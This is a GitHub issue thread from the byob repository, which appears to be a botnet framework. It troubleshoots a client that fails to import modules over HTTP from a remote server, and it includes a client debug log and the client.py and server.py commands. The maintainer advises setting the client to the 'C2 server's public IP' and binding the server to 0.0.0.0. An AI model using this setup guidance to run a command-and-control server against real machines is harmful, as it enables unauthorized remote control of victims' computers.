### ISSUE TITLE
urllib3 cannot be loaded in client side 

### ISSUE THREAD

**Issue by 141801** [malwaredllc/byob#79]
XX.XX.XX.XX is server ip 
server and cilent are not in one pc

log of client side  is as follows
-------------------------------------------------------------------------
DEBUG:__main__:LOADER=================
DEBUG:__main__:Loading requests.packages.urllib3...
DEBUG:__main__:Trying to import 'requests.packages.urllib3' as package from: 'http://XX.XX.XX.XX:82/requests/packages/urllib3/__init__.py'
INFO:__main__:[-] 'requests.packages.urllib3' is not a package (HTTP Error 404: File not found)
DEBUG:__main__:[+] Trying to import 'requests.packages.urllib3' as module from: 'http://XX.XX.XX.XX:82/requests/packages/urllib3.py'
INFO:__main__:[-] 'requests.packages.urllib3' is not a module (HTTP Error 404: File not found)
DEBUG:__main__:Unable to connect to server. Retrying in 30 seconds...
------------------------------------------------------------------------------
open   http://XX.XX.XX.XX:82/requests/packages/   in chrome  I can see 3 files

_init__.py
__init__.pyc
idna/

**Comment by 141801** [comment]
client is under a http-proxy corp
both sides are using python2.7 

server side command : 
python client.py --name t1  XX.XX.XX.XX   80
python server.py --host  XX.XX.XX.XX  --port 80

client side command:
python t1.py

**Comment by malwaredllc** [comment]
When running client.py, set the IP address to the C2 server's public IP address (ex. `python client.py XX.XX.XX.XX 1337`).

When running server.py, set the `--host` argument to 0.0.0.0, or don't set it at all and it will default to 0.0.0.0 (ex. `python server.py --port 1337` or `python server.py --host 0.0.0.0 --port 1337`).

**Comment by 141801** [comment]
> When running client.py, set the IP address to the C2 server's public IP address (ex. `python client.py XX.XX.XX.XX 1337`).
> 
> When running server.py, set the `--host` argument to 0.0.0.0, or don't set it at all and it will default to 0.0.0.0 (ex. `python server.py --port 1337` or `python server.py --host 0.0.0.0 --port 1337`).

thanks , I seems work well now
